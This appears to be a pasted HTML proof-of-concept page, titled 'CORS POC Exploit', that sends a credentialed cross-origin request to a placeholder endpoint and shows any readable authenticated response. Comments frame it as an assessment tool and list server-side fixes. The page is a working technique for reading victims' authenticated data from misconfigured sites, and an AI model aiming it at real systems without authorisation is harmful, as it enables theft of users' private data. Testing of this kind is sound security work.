Untitled

a guest
Jun 30th, 2017
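  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>CORS POC Exploit</title>
    <style>
      body { text-align: center; }
      #result { text-align: left; white-space: pre-wrap; }
    </style>
  </head>
  <body>
    <!--
      Test page for a CORS misconfiguration on an endpoint you are assessing.

      What it checks: whether a page on a different origin can read an
      authenticated response. The browser only hands the response body to this
      script when the server answers with an Access-Control-Allow-Origin header
      that names this page's origin exactly (the wildcard is rejected for
      credentialed requests) together with Access-Control-Allow-Credentials: true.

      What to fix when the body is displayed: compare the request's Origin
      against a fixed allowlist instead of echoing it back, send
      Access-Control-Allow-Credentials only for those origins, add Vary: Origin
      so caches do not mix responses, and set SameSite on session cookies.
    -->
    <h2>CORS POC Exploit</h2>

    <div id="demo">
      <button type="button" id="run">Exploit</button>
      <pre id="result"></pre>
    </div>

    <script>
      /**
       * Sends one credentialed cross-origin GET to the configured endpoint and
       * shows the outcome inside #demo.
       *
       * The response is written with textContent, never innerHTML: the body
       * comes from another origin and must not be parsed as markup in this
       * page, otherwise any script or event-handler attribute it contains
       * would run here.
       */
      function cors() {
        var result = document.getElementById("result");
        var xhttp = new XMLHttpRequest();

        xhttp.onreadystatechange = function () {
          // 4 === DONE; earlier states carry no complete body.
          if (this.readyState !== 4) {
            return;
          }
          if (this.status === 200) {
            result.textContent = this.responseText;
          } else {
            // Status 0 at DONE means the browser withheld the response
            // (CORS policy refused the read) or the request never completed;
            // the browser console states which. A refused read is the
            // expected result for a correctly configured server.
            result.textContent =
              "No readable response (status " + this.status + ").";
          }
        };

        // Replace the placeholder with the endpoint under test.
        xhttp.open("GET", "YOUR_ENDPOINT GOES HERE", true);
        // Ask the browser to attach cookies / HTTP auth for the target origin.
        // Cookies marked SameSite=Lax or Strict are not attached to this
        // cross-site request, so the result also depends on cookie attributes.
        xhttp.withCredentials = true;
        xhttp.send();
      }

      document.getElementById("run").addEventListener("click", cors);
    </script>
  </body>
  </html>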